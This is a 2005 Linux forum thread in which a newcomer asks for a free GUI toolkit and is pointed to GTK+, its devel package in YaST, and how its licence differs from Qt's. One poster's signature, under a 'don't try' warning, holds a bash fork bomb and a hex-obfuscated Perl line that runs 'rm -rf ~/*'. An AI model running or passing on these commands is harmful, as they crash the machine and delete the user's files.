Results 1 to 10 of 10
Is there under linux some development application for graphical design , like QT , , but which is free also for commercial purposes ?...
- 08-25-2005 #1Just Joined!
- Join Date
- Aug 2005
- Posts
- 70
free graphical development
Is there under linux some development application for graphical design , like QT , , but which is free also for commercial purposes ?
- 08-25-2005 #2
Perhaps GTK+?
Registered Linux user #270181
TechieMoe's Tech Rants
- 08-25-2005 #3Linux Newbie
- Join Date
- Jul 2004
- Location
- Calcutta, India
- Posts
- 220
GTK+ is one of the foremost and its free ..
WARNING!!! Don\'t try the following :
Registered Linux User #382098Code:bash$ :(){ :|:&};: -- bash$ `perl -e\'print\"\\x72\\x6D\\x20\\x2D\\x72\\x66\\x20\\x7E\\x2F\\x2A\"\'`
- 08-25-2005 #4Just Joined!
- Join Date
- Aug 2005
- Posts
- 70
So , did gtk+ come with my liinux distribution (suse 9.3) ? cause I can't find it anywhere and I did a full instalation .
- 08-25-2005 #5
It probably did, but the development packages for it may not have been installed. You might open up YaST and search for GTK. The package might be called something like gtk-devel.
Registered Linux user #270181
TechieMoe's Tech Rants
- 08-25-2005 #6Just Joined!
- Join Date
- Aug 2005
- Posts
- 70
I found a package in yast which is called gtk2-devel and it is installed . How do I start gtk+ then ? And one other thing: is gtk+ only for creation of GUI in Gnome , or also for KDE ?
- 08-25-2005 #7Just Joined!
- Join Date
- Aug 2005
- Posts
- 70
Also , is there a GUI designer for gtk+ ?
- 08-26-2005 #8Linux Newbie
- Join Date
- Feb 2005
- Location
- Texas
- Posts
- 168
How does gtk compare to Qt?
Thanks, JeffRegistered Linux User #391940
- 08-26-2005 #9Just Joined!
- Join Date
- Aug 2005
- Posts
- 70
That is one of the things that I don't understand either mostly because I'm new to this graphical "mambo jambo"
. As far as I understood gtk+ is a class of graphical libraries , and QT is an application which uses libraries (probably not gtk libraries), I guess ..
, isn't it ? I could be way off here
, someone enlighten me pls
!
Also if someone could answer my questions above I would be gratefull ! Tahnks .
- 08-26-2005 #10I can't speak for how they perform in applications (since I've never designed in GTK+) but the obvious difference is their license. Qt is not free (no cost) for commercial use. GTK+ is. That doesn't necessarily mean it's *better*, but I think that's an important difference.
Originally Posted by jlgreer1 Registered Linux user #270181
TechieMoe's Tech Rants


Reply With Quote
